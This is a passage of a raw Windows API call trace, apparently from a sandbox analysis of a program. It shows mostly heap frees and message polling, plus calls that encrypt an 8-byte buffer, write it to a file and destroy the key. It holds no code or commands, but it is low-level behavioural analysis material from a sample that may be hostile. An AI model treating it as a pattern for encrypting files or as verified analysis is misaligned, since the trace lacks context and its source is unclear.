[0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0218.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0218.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0218.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0218.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0218.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0218.052] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0218.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.052] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0218.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.052] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.053] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.053] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.053] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabce0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0218.053] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72738*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72738*, pdwDataLen=0x8cef60*=0x8) returned 1 [0218.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.053] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.053] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.053] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.053] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.053] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.053] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.054] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.054] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.054] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.054] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.054] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.054] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.054] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.054] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.054] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.054] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.054] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.054] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.054] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.058] WriteFile (in: hFile=0x50c, lpBuffer=0x2a72628*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72628*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0218.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.059] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0218.059] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.059] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0218.059] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.059] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.059] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.059] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.059] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.059] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.059] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab9e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0218.060] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0218.060] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.060] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.060] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.060] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.060] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.060] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.060] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.060] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.060] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.060] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.060] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.060] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.060] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.060] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.085] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.085] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.085] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.085] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.085] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.087] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.087] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.087] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.087] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.087] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.087] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.087] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.087] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.088] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.088] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.088] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.088] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.088] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.088] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.088] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.088] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.088] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.088] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.088] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.088] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.088] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.088] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0218.088] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.088] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0218.088] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 